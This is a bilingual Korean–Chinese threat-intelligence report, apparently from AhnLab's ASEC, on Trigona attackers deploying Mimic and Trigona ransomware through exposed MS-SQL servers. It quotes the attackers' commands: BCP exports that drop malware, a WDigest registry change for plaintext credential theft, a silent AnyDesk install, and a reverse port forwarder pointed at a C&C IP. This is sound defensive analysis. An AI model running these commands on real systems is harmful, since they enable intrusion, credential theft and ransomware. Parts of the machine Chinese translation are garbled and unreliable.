Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자

AhnLab SEcurity intelligence Center(ASEC)은 최근 Trigona 랜섬웨어 공격자가 Mimic 랜섬웨어를 설치하는 새로운 활동을 확인하였다. 이번에 확인된 공격 사례는 기존 사례들과 유사하게 MS-SQL 서버를 대상으로 하며 악성코드 설치 과정에서 MS-SQL 서버의 BCP(Bulk Copy Program) 유틸리티 악용했다는 점이 특징이다.
AhnLab 安全情报中心 (ASEC) 最近发现了一项新活动,其中 Trigona 勒索软件攻击者安装了 Mimic 勒索软件。这次确定的攻击案例针对 MS-SQL 服务器,与以前的案例类似,其特点是在安装恶意软件期间利用 MS-SQL 服务器的大容量复制程序 (BCP) 实用程序。

  • Trigona 랜섬웨어 : 적어도 2022년 6월부터 활동한 것으로 알려졌으며 [1] 주로 MS-SQL 서버를 공격 대상으로 최근까지도 활동이 지속되고 있다.
    Trigona 勒索软件:它至少从 2022 年 6 月开始活跃,[1] 并且一直持续到最近,主要针对 MS-SQL 服务器。
  • Mimic 랜섬웨어 : 2022년 6월에 최초로 발견되었으며 [2] 2024년 1월에는 터키어를 사용하는 공격자가 부적절하게 관리되는 MS-SQL 서버를 공격해 Mimic 랜섬웨어를 공격한 사례가 공개되었다. [3]
    Mimic Ransomware:2022 年 6 月首次被发现,[2] 2024 年 1 月,一名讲土耳其语的攻击者攻击了管理不当的 MS-SQL 服务器,以攻击 Mimic Ransomware。[3]

ASEC에서는 2024년 1월 초 BCP를 활용해 Mimic 랜섬웨어를 설치하는 공격 사례를 최초로 확인하였으며, 2024년 1월 중순에는 동일한 방식의 공격 사례들에서 Mimic 랜섬웨어 대신 Trigona 랜섬웨어가 설치된 것을 확인하였다. Mimic 랜섬웨어의 랜섬노트에서 사용한 공격자의 이메일 주소는 다른 공격 사례들에서 확인되지 않았지만 이후 확인된 Trigona 랜섬웨어의 랜섬노트에서는 2023년 초부터 Trigona 랜섬웨어 공격자가 사용하고 있는 이메일 주소가 사용되었다. [4]
2024 年 1 月初,ASEC 发现了第一个使用 BCP 安装 Mimic 勒索软件的攻击实例,并在 2024 年 1 月中旬确认在同一攻击案例中安装了 Trigona 勒索软件而不是 Mimic 勒索软件。Mimic Ransomware 赎金票据中使用的攻击者的电子邮件地址尚未在其他攻击中得到验证,但自 2023 年初以来被发现的 Trigona 勒索软件使用了 Trigona 勒索软件攻击者使用的电子邮件地址。[4]

이에 따라 2024년 1월 중순에 확인된 공격 사례는 기존 Trigona 공격자의 소행으로 여겨지며 2024년 1월 초에 확인된 Mimic 랜섬웨어 공격 사례도 동일한 공격자로 보고 있다. 이는 두 개의 사례 모두 부적절하게 관리되는 MS-SQL 서버를 대상으로 하였다는 점과 악성코드 설치에 BCP를 사용하였다는 점 그리고 공격에 사용된 다양한 문자열, 경로명이 동일한 점을 근거로 한다. 이외에도 각각의 공격 사례들에서 동일한 악성코드가 사용된 점도 있다.
因此,2024 年 1 月中旬发现的攻击被认为是原始 Trigona 攻击者所为,而 2024 年 1 月初发现的 Mimic 勒索软件攻击也被认为是同一攻击者。这是基于以下事实:这两个案例都针对管理不当的 MS-SQL 服务器,BCP 用于安装恶意软件,并且攻击中使用的各种字符串和路径名是相同的。此外,每次攻击都使用了相同的恶意软件。

1. Trigona 랜섬웨어 1. Trigona 勒索软件

Trigona 랜섬웨어는 델파이 언어로 개발되었으며 파일들을 암호화할 때 RSA 및 AES 암호화 알고리즘을 이용한다. 2023년 2월 Arete 사의 보고서에서 ManageEngine 취약점(CVE-2021-40539)을 공격한 사례가 확인되었으며, [5] 2023년 4월에는 자사 ASEC 블로그에서 부적절하게 관리되는 MS-SQL 서버를 대상으로 한 공격 사례를 공개한 바 있다. [6]
Trigona 勒索软件是用 Delphi 语言开发的,并使用 RSA 和 AES 加密算法来加密文件。2023 年 2 月,Arete 发现了对 ManageEngine 漏洞的攻击 (CVE-2021-40539)[5],2023 年 4 月,该公司在其 ASEC 博客上披露了对管理不当的 MS-SQL 服务器的攻击。[6]

이번 공격 사례도 2023년과 동일하게 MS-SQL 서버를 대상으로 하며 랜섬노트에 저장된 공격자의 이메일 주소를 통해 이번에 확인된 Trigona 랜섬웨어도 이전 사례들과 동일한 공격자임을 알 수 있다.
这次攻击也像 2023 年一样针对 MS-SQL 服务器,勒索票据中存储的攻击者电子邮件地址显示,这次识别的 Trigona 勒索软件与之前的案例是同一个攻击者。

  • Email : farusbig@tutanota[.]com
    电子邮件 : farusbig@tutanota[.]com
  • URL : hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
    网址 : hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]洋葱/
Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 1. 암호화된 파일들과 랜섬노트
图 1.加密文件和赎金票据

2. Mimic 랜섬웨어 2. 模仿勒索软件

Mimic 랜섬웨어는 암호화할 대상이 되는 파일들을 찾는 과정에서 Everything이라고 하는 파일 검색 프로그램을 악용하는 것이 특징인 랜섬웨어이다. 공격자는 시스템에 존재하는 파일들을 암호화하는 작업을 더 빠르게 하기 위해 Everything 도구를 악용하는 것으로 추정된다. 이외에도 개발 과정에서 소스 코드가 공개된 Conti 랜섬웨어의 기능들을 차용하기도 했다. [7]
Mimic Ransomware 是一种勒索软件,它利用一个名为 Everything 的文件检索程序来查找需要加密的文件。据信,攻击者正在利用 Everything 工具来加快系统上文件的加密过程。此外,它还借鉴了 Conti 勒索软件的功能,其源代码在开发过程中被披露。[7]

2023년 1월에 공개된 TrendMicro 보고서와 2024년 1월에 공개된 Securonix 보고서에서 각각 확인된 Mimic 랜섬웨어들과 이번 공격에서 사용된 것은 거의 외형적으로는 거의 동일한 형태이다. 악성코드는 7z SFX 실행 압축 파일로 제작되었으며 내부에 “Everything64.dll”이라는 이름의 압축 파일에 실제 악성코드들과 Everything 도구들이 암호 압축되어 있다. 악성코드가 실행되면 내부에 포함된 7z 및 “Everything64.dll” 압축 파일을 압축 해제하고 다음과 같이 비밀번호를 이용해 압축을 해제한다.
分别在 2023 年 1 月发布的 TrendMicro 报告和 2024 年 1 月发布的 Securonix 报告中发现的 Mimic 勒索软件在外观上与此次攻击中使用的勒索软件几乎相同。该恶意软件被创建为7z SFX可执行压缩文件,其中实际的恶意软件和所有工具都以加密方式压缩在名为“Everything64.dll”的压缩文件中。执行后,其中包含的 7z 和“Everything64.dll”存档将被提取并使用密码解压缩,如下所示:

> 7za.exe x -y -p58042791667523172 Everything64.dll
> 7za.exe x -y -p624417568130113444 Everything64.dll
Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 2. 7z SFX 및 압축 파일에 포함된 파일들
图2.7z SFX 和压缩文件中包含的文件

최종적으로 설치된 폴더에는 Mimic 랜섬웨어와 Everything 도구들 외에도 윈도우 디펜더를 비활성화하기 위한 목적의 Defender Control 도구(DC.exe) 그리고 Sysinternals의 SDelete 도구(xdel.exe)가 함께 포함되어 있다.
除了 Mimic 勒索软件和 Everything 工具外,最终文件夹还包含来自 Sysinternals 的 Defender 控制工具 (DC.exe) 和 SDelete 工具 (xdel.exe),它们旨在禁用 Windows Defender。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 3. 설치된 파일들 图3.已安装的文件

랜섬노트에 적힌 공격자의 이메일 주소는 2023년 1월에 공개된 TrendMicro 보고서와 2024년 1월에 공개된 Securonix 보고서의 Mimic 랜섬웨어들이 사용한 것과 다르며 다른 공격 사례들에서도 확인되지 않는다. 대신 뒤에서 다룰 여러 가지 정황들을 통해 Trigona 랜섬웨어 공격자가 Mimic 랜섬웨어를 공격에 함께 사용하고 있는 것으로 추정하고 있다.
勒索信中列出的攻击者电子邮件地址与 2023 年 1 月发布的 TrendMicro 报告和 2024 年 1 月发布的 Securonix 报告中 Mimic 勒索软件使用的电子邮件地址不同,并且未在其他攻击案例中得到证实。相反,许多情况表明 Trigona 勒索软件攻击者正在他们的攻击中使用 Mimic 勒索软件。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 4. 암호화된 파일들과 랜섬노트
图4.加密文件和赎金票据

3. BCP를 이용한 악성코드 설치
3. 使用 BCP 安装恶意软件

공격 대상은 부적절하게 관리되고 있는 MS-SQL 서버 즉 외부에 노출되어 있으면서 계정 정보를 단순하게 설정하여 무차별 대입 공격이나 사전 공격에 취약한 시스템들로 추정된다. 이는 Trigona 랜섬웨어 공격자가 과거부터 이러한 시스템들을 공격 대상으로 한다는 점 외에도 LoveMiner, Remcos RAT 등의 악성코드들이 해당 공격 과정 전과 후에 설치된 감염 로그들이 존재하는 것을 통해 추정할 수 있다.
据信,目标是管理不当的 MS-SQL 服务器,这些系统暴露在外部,并且由于简单的帐户信息而容易受到暴力攻击或字典攻击。这可以从以下事实推断:Trigona 勒索软件攻击者过去曾针对这些系统,以及 LoveMiner 和 Remcos RAT 等恶意软件在攻击前后安装的感染日志的存在。

3.1. BCP를 이용한 파일 생성
3.1. 使用 BCP 创建文件

BCP(Bulk Copy Program) 유틸리티인 bcp.exe는 MS-SQL 서버에서 대량의 외부 데이터를 가져오거나 내보내는데 사용되는 커맨드 라인 도구이다. 일반적으로 SQL 서버의 테이블에 저장된 대량의 데이터를 로컬의 파일로 저장하거나 로컬에 저장된 데이터 파일을 SQL 서버의 테이블에 내보내는데 사용된다.
bcp.exe 是大容量复制程序 (BCP) 实用工具,是用于从 MS-SQL 服务器导入或导出大量外部数据的命令行工具。它通常用于将存储在 SQL Server 上的表中的大量数据存储到本地文件,或将本地存储的数据文件导出到 SQL Server 上的表。

일반적으로 MS-SQL 서버를 공격하는 공격자는 악성코드 다운로드 시 파워쉘 명령을 이용하며 최근에는 SQL 서버에 포함되어 있는 파워쉘 도구인 SQLPS를 악용하기도 한다. [8] 하지만 이번 공격 사례에서 공격자는 데이터베이스에 악성코드를 저장한 이후 BCP를 이용해 로컬에 파일로 생성하는 방식을 사용한 것으로 추정된다.
通常,攻击 MS-SQL 服务器的攻击者使用 PowerShell 命令下载恶意软件,最近,他们还利用 SQLPS(SQL Server 附带的 PowerShell 工具)。[8]然而,在这种情况下,攻击者被认为已将恶意软件存储在数据库中,然后使用BCP将其生成为本地文件。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 5. BCP를 이용한 악성코드 생성
图5.使用 BCP 生成恶意软件

공격자는 Trigona 랜섬웨어 바이너리가 저장된 테이블 “uGnzBdZbsi”에서 다음과 같은 명령을 이용해 로컬 경로로 Trigona 랜섬웨어를 내보낸 것으로 추정된다. 참고로 “FODsOZKgAU.txt”는 포맷 파일로서 포맷 정보가 포함되어 있을 것으로 보인다.
据信,攻击者已使用存储 Trigona 勒索软件二进制文件的表“uGnzBdZbsi”中的以下命令将 Trigona 勒索软件导出到本地路径:作为参考,“FODsOZKgAU.txt”是一个格式化文件,可能包含格式信息。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 6. 공격에 사용된 BCP 명령
图6.攻击中使用的 BCP 命令

다음은 공격에 사용된 다양한 악성코드 및 도구들을 내보내는데 사용된 BCP 명령들이다.
以下是用于释放攻击中使用的各种恶意软件和工具的 BCP 命令。

  • Anydesk Anydesk安力桌
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Port Forwarder 악성코드 端口转发器恶意软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Launcher 악성코드 启动器恶意软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
  • Mimic 랜섬웨어 模仿勒索软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt”
  • Trigona 랜섬웨어 Trigona 勒索软件
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
  • 기타
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”

    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
    > bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”

3.2. 정보 조회 3.2. 信息查询

참고로 BCP를 이용해 악성코드를 생성하기 전 즉 공격에 성공한 이후 공격자가 가장 먼저 실행하는 명령은 다음과 같이 감염 시스템의 정보를 조회하는 명령들이다. 공격자는 해당 명령들을 통해 얻은 정보들을 바탕으로 환경에 맞는 악성코드들을 설치하였을 것으로 보인다.
作为参考,攻击者在使用 BCP 创建恶意软件之前(即攻击成功后)执行的第一个命令是查询受感染系统信息的命令,如下所示。攻击者很可能根据通过这些命令获得的信息安装了适合环境的恶意软件。

> hostname >主机名
> whoami >哇
> wmic computersystem get domain
> WMIC 计算机系统获取域

> wmic computersystem get totalphysicalmemory
> wmic 计算机系统获取 TotalPhysicalMemory

3.3. 자격 증명 정보 탈취
3.3. 凭证信息被盗

Trigona 랜섬웨어 공격자는 자격 증명 정보를 탈취하기 위해 미미카츠를 사용하는 것으로 알려져 있다. [9] [10] 비록 공격 과정에서 미미카츠의 로그는 확인되지 않았지만 공격자는 WDigest 보안 패키지를 이용한 평문 비밀번호를 획득하기 위해 UseLogonCredential 레지스트리 키를 설정하는 명령을 실행하기도 하였다.
众所周知,Trigona 勒索软件攻击者使用 Mimikatsu 窃取凭据信息。[9] [10]尽管在攻击过程中没有找到Mimikatsu的日志,但攻击者还执行了一个命令来配置UseLogonCredential注册表项,以使用WDiest安全包获取明文密码。

> REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001
> REG 添加“HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest”/v UseLogonCredential /t REG_DWORD /d 0x00000001

3.4. AnyDesk 3.4. AnyDesk安力桌

이외에도 감염 시스템을 제어하기 위해 Anydesk를 설치하였다. AnyDesk는 원격 관리 도구로써 원격 데스크톱, 파일 전송 등 다양한 기능들을 제공한다. 원격 데스크톱이라고 한다면 RDP와 같이 AnyDesk가 설치된 환경에 원격으로 접속하여 GUI 환경에서 제어를 지원하는 기능이다.
此外,还安装了Anydesk来控制受感染的系统。AnyDesk 是一款远程管理工具,提供远程桌面、文件传输等功能。远程桌面是一种远程访问安装AnyDesk的环境(如RDP)的功能,并支持在GUI环境中进行控制。

Anydesk는 기존 Trigona 랜섬웨어 공격자뿐만 아니라 대부분의 공격 그룹들이 악용하는 대표적인 원격 관리 도구이다. 원격 관리 도구는 재택근무나 원격 제어 및 관리를 위한 정상적인 목적으로 사용하는 사례가 많으며 이에 따라 AntiVirus 제품에서는 일반적인 악성코드들과 달리 이러한 도구들을 단순하게 탐지하고 차단하는 데 한계가 존재한다. 공격자들은 이러한 점을 악용하여 최초 침투 과정이나 측면 이동 과정에서 공격 대상 시스템을 제어하기 위해 RAT 악성코드 대신 원격 제어 도구들을 설치하기도 한다.
Anydesk是大多数攻击组织以及传统的Trigona勒索软件攻击者使用的领先远程管理工具。远程管理工具通常用于正常目的,例如在家工作或进行远程控制和管理,因此,与常见的恶意软件不同,防病毒产品在简单地检测和阻止这些工具方面受到限制。攻击者利用这一点安装远程控制工具而不是 RAT 恶意软件,以在初始渗透或横向移动期间控制目标的系统。

> %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent
> %SystemDrive%\users\%ASD%\music\AD.exe –install C:\“Program Files (x86)”\ –silent

> %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id”
> %SystemDrive%\“Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id”

4. 공격에 사용된 악성코드 분석
4. 分析攻击中使用的恶意软件

이번에 확인된 공격 사례에서는 BCP를 악용했다는 점 외에도 안전 모드를 활용한 정황이 확인되었다는 것도 특징이다. Mimic 랜섬웨어와 Trigona 랜섬웨어 공격에서는 공격자가 제작한 것으로 보이는 두 개의 악성코드가 추가적으로 확인된다.
除了BCP被滥用之外,该攻击的特点还在于使用了安全模式。Mimic Ransomware 和 Trigona Ransomware 攻击识别了另外两个似乎由攻击者创建的恶意软件。

하나는 자신을 안전 모드에서도 동작 가능한 서비스로 등록하고 이후 서비스로 동작할 시 인자로 전달받았던 프로그램을 실행시키는 기능을 담당하는 Launcher 악성코드이다. 다른 하나는 동일하게 안전 모드에서도 동작 가능한 서비스로 등록한 이후 RDP를 활성화하고 인자로 전달받은 주소에 RDP 포트에 대한 포워딩을 지원하는 Port Forwarder 악성코드이다.
一种是 Launcher 恶意软件,它将自己注册为可以在安全模式下运行的服务,并负责执行作为服务运行时作为参数发送的程序。另一种是端口转发器恶意软件,它在注册为也可以在安全模式下运行的服务后启用 RDP,并支持将 RDP 端口转发到作为参数传递的地址。

PDB 정보에 따르면 공격자는 Launcher 악성코드를 “app2”로, 포트 포워더 악성코드를 “client”로 이름 지었다.
根据 PDB 信息,攻击者将 Launcher 恶意软件命名为“app2”,将端口转发器恶意软件命名为“client”。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 7. 유사한 PDB 정보를 갖는 공격자 제작 악성코드들
图7.攻击者创建的具有类似 PDB 信息的恶意软件

비록 시스템의 부팅 방식을 안전 모드로 설정하는 악성코드나 명령 로그는 확인되지 않았지만 다음과 같이 MS-SQL 서버 프로세스가 시스템을 재부팅하는 명령을 실행한 로그는 확인된다. Launcher 악성코드가 인자로 전달받은 악성코드를 실행한 이후 안전 모드 부팅 옵션을 비활성화하는 것을 보면 정황상 공격자는 악성코드 설치 이후 시스템을 안전 모드로 재부팅하여 랜섬웨어를 동작시킨 것으로 추정된다.
尽管没有恶意软件或命令日志将系统启动设置为安全模式,但存在 MS-SQL Server 进程执行命令以重新启动系统的日志,例如:考虑到 Launcher 恶意软件在执行作为参数传递的恶意软件后禁用安全模式启动选项,假设攻击者在安装恶意软件后通过以安全模式重新启动系统来激活勒索软件。

> shutdown -r -f -t 5

4.1. Launcher 악성코드 4.1. 启动器恶意软件

공격자는 다음과 같은 인자를 전달하여 Launcher 악성코드를 실행시켰다. Launcher 악성코드는 실행 시 “C:\windows\temp\LeVfeNXHoa” 경로에 자신을 복사한다. 이후 전달받은 인자에 따라 다음 작업을 진행하는데 먼저 첫 번째 인자로 서비스의 이름을 그리고 두 번째 인자로 복사할 파일의 경로를 전달받는다. 두 번째 인자에서 전달받은 경로의 파일은 세 번째 인자로 전달받은 경로로 옮긴다. 참고로 두 번째 인자로 전달받은 파일은 Mimic 랜섬웨어였다.
攻击者通过传递以下参数来执行 Launcher 恶意软件:Launcher 恶意软件在执行时将自身复制到路径“C:\windows\temp\LeVfeNXHoa”。之后,我们根据收到的参数进行下一个操作,首先使用第一个参数绘制服务的名称,并使用第二个参数绘制要复制的文件的路径。在第二个参数中传递的路径中的文件将移动到在第三个参数中传递的路径。顺便说一句,作为第二个参数传递的文件是 Mimic 勒索软件。

> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”
> %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE”

Launcher 악성코드는 첫 번째 인자로 전달받은 이름인 “1111111”로 자신을 서비스에 등록한 후 안전 모드에서도 동작할 수 있도록 추가적인 작업을 진행한다. 이후 서비스로 동작하면 세 번째 인자로 전달받은 경로의 랜섬웨어를 실행하며 여기까지의 과정이 끝나면 안전 모드 설정을 비활성화하여 다시 정상적으로 부팅될 수 있도록 한다.
Launcher 恶意软件使用第一个参数 (“1111111”) 注册自身并执行其他任务以确保它可以在安全模式下运行。之后,如果它作为服务工作,它将在作为第三个参数传递的路径中执行勒索软件,当该过程完成时,安全模式设置将被禁用,以便它可以再次正常启动。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 8. 등록한 서비스의 안전모드 설정과 랜섬웨어 실행 이후 이를 다시 해제하는 루틴
图8.设置已注册服务的安全模式以及勒索软件执行后再次关闭的例程

4.2. Port forwarder 4.2. 端口转发器

공격자는 다음과 같은 인자를 전달하여 Port forwarder 악성코드를 실행시켰다. 포트 포워딩이랑 특정 포트에서 전달받은 데이터를 다른 포트로 전달하는 기능이다. 해당 악성코드는 RDP 서비스 즉 3389번 포트에 대한 포트 포워딩을 지원한다. 일반적으로 RDP 관련 포트 포워딩 도구들은 외부에서 공격자가 NAT 환경에 직접 접근할 수 없는 점을 극복하기 위해 사용된다.
攻击者通过传递以下参数来执行端口转发器恶意软件:它是将从某个端口接收到的数据转发到另一个端口的功能。该恶意软件支持将端口转发到 RDP 服务,即端口 3389。通常,RDP相关的端口转发工具用于克服外部攻击者无法直接访问NAT环境的问题。

Port forwarder는 리버스 커넥션 방식으로 공격자의 주소에 먼저 연결한 이후 감염 시스템의 RDP 포트에 연결하여 두 개의 통신을 중개해 준다. 이에 따라 공격자는 NAT 환경에서 동작 중인 시스템이더라도 RDP 연결이 가능해져 원격에서 감염 시스템을 제어할 수 있게 된다. 이렇게 RDP를 활용하기 때문에 악성코드는 다음 명령들을 실행해 추가적으로 RDP 서비스를 활성화하기도 한다.
端口转发器使用反向连接首先连接到攻击者的地址,然后连接到受感染系统的 RDP 端口,从而调解两个通信。因此,即使系统在 NAT 环境中运行,攻击者也可以建立 RDP 连接,从而允许他们远程控制受感染的系统。由于它使用 RDP,因此恶意软件还可以通过执行以下命令来激活 RDP 服务:

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 9. RDP 서비스 활성화 루틴
图 9.RDP 服务激活例程

Port forwarder는 설치 모드로 실행 시 자신을 “C:\windows\temp\WindowsHostServicess.exe” 경로에 복사하고 “WindowsHostServicess” 이름으로 서비스에 등록한다. 서비스는 위 Launcher 악성코드와 유사하게 안전 모드에서도 동작할 수 있도록 설정한다.
当端口转发器在安装模式下运行时,它会将自身复制到路径“C:\windows\temp\WindowsHostServicess.exe”,并使用名称“WindowsHostServicess”注册服务。与上面的 Launcher 恶意软件类似,该服务配置为在安全模式下工作。

> %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install
> %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233“ – 端口 ”3366“ – 安装

Port forwarder는 5개의 인자를 갖는데 3개는 모드로서 각각 설치, 삭제 그리고 실행 기능을 지원한다. 실행 모드에서는 위의 서비스 설치 과정 없이 인자로 전달받은 C&C 서버에 접속하여 포트 포워딩을 지원한다.
端口转发器有 5 个因素,其中 3 个是支持安装、卸载和运行的模式。在执行模式下,它连接到传入参数的 C&C 服务器,无需安装上述服务,并支持端口转发。

인자 설명
–install –安装 설치 모드 安装方式
–uninstall –卸载 삭제 모드 删除模式
–run –跑 실행 모드 执行模式
–ip C&C 서버의 IP 주소 C&C 服务器的 IP 地址
–port –港口 C&C 서버의 Port 번호 C&C服务器的端口号
Table 1. Port forwarder의 인자
表 1.端口转发器的参数

C&C 서버에 접속하기 전에는 “C:\windows\temp\elZDk6geQ8” 경로에 운영체제 정보나 사용자 및 컴퓨터 이름 등의 시스템의 기본적인 정보들을 저장하며 최초 접속 시 해당 정보들을 전달한다.
在连接到C&C服务器之前,它将操作系统信息以及用户和计算机名称等基本系统信息存储在路径“C:\windows\temp\elZDk6geQ8”中,并在第一次连接时传输这些信息。

Mimic 랜섬웨어를 사용하는 Trigona 랜섬웨어 공격자
Figure 10. C&C 서버에 전달하는 시스템 정보
图 10.系统信息转发到 C&C 服务器

이후 C&C 서버로부터 전달받은 명령에 따라 포트 포워딩 또는 자가 삭제 명령을 수행할 수 있다.
之后,您可以按照从 C&C 服务器收到的命令执行端口转发或自删除命令。

명령 기능
0x8CC03FAF C&C 서버와 RDP 서비스에 대한 포트 포워딩 시작
启动 C&C Server 和 RDP 服务的端口转发
0x0002C684 자가 삭제 自我删除
Table 2. Port forwarder의 인자
表 2.端口转发器的参数

5. 결론 5. 结论

최근 Trigona 랜섬웨어 공격자가 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 Mimic 랜섬웨어 및 Trigona 랜섬웨어를 설치하고 있다. 공격자는 포트 포워딩 기능을 담당하는 악성코드를 이용해 감염 시스템에 RDP로 접속하여 원격 제어를 하려는 시도도 확인된다.
最近,Trigona Ransomware 攻击者一直在针对管理不当的 MS-SQL 服务器安装 Mimic Ransomware 和 Trigona Ransomware。还确认攻击者将尝试使用负责端口转发功能的恶意软件对受感染的系统进行 RDP 并远程控制它。

Trigona와 같은 랜섬웨어 공격자들은 수익을 위해 감염 시스템을 암호화하고 민감한 정보를 탈취하여 협박하는 방식을 사용하고 있다. 이외에도 자격 증명 정보 탈취 및 측면 이동을 위한 다양한 기법들을 시도하기 때문에 기업에서는 단일한 시스템뿐만 아니라 기업 내부망 전체가 장악되어 기업의 민감한 정보들이 탈취당하고 네트워크 내의 시스템들이 암호화될 수 있다.
像 Trigona 这样的勒索软件攻击者通过加密受感染的系统并窃取敏感信息来敲诈勒索以牟利。此外,还使用各种技术来窃取凭证信息并横向移动,这样不仅单个系统,而且整个内部网络都可以被企业接管,这可能导致敏感信息被盗和网络内系统的加密。

MS-SQL 서버를 대상으로 하는 공격에는 대표적으로 부적절하게 계정 정보를 관리하고 있는 시스템들에 대한 무차별 대입 공격(Brute Forcing)과 사전 공격(Dictionary Attack)이 있다. 관리자들은 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하여 무차별 대입 공격과 사전 공격으로부터 데이터베이스 서버를 보호해야 한다.
对 MS-SQL 服务器的攻击包括对不当管理帐户信息的系统的暴力攻击和字典攻击。管理员应保护数据库服务器免受暴力攻击和字典攻击,方法是使用难以猜测的帐户密码并定期更改密码。

그리고 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다. 또한 외부에 공개되어 접근 가능한 데이터베이스 서버에 대해 방화벽과 같은 보안 제품을 이용해 외부 공격자로부터의 접근을 통제해야 한다. 위와 같은 조치가 선행되지 않을 경우 공격자 및 악성코드들에 의해 계속적인 감염이 이루어질 수 있다.
此外,您应该将 V3 更新到最新版本,以防止恶意软件提前感染。您还应该使用安全产品(如防火墙)来控制外部攻击者对公开可用和可访问的数据库服务器的访问。如果不采取上述措施,攻击者和恶意软件可能会继续感染它们。

파일 진단 文件诊断
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– 特洛伊木马/Win.Generic.R531737 (2022.10.27.00)

– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)

– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– 勒索软件/Win.Mimic.C5543473 (2023.11.18.01)

– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– 勒索软件/Win.Filecoder.C5561780 (2023.12.12.01)

– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– 特洛伊木马/Win.Agent.C5574264 (2024.01.14.03)

– Trojan/Win.Agent.C5574265 (2024.01.14.03)
– 特洛伊木马/Win.Agent.C5574265 (2024.01.14.03)

행위 진단 行为诊断
– Malware/MDP.Minipulate.M71
– 恶意软件/MDP。Minipulate.M71型

– Persistence/MDP.AutoRun.M203
– 持久性/MDP。自动运行.M203

– DefenseEvasion/MDP.ModifyRegistry.M1234
– 防御规避/MDP。修改注册表.M1234

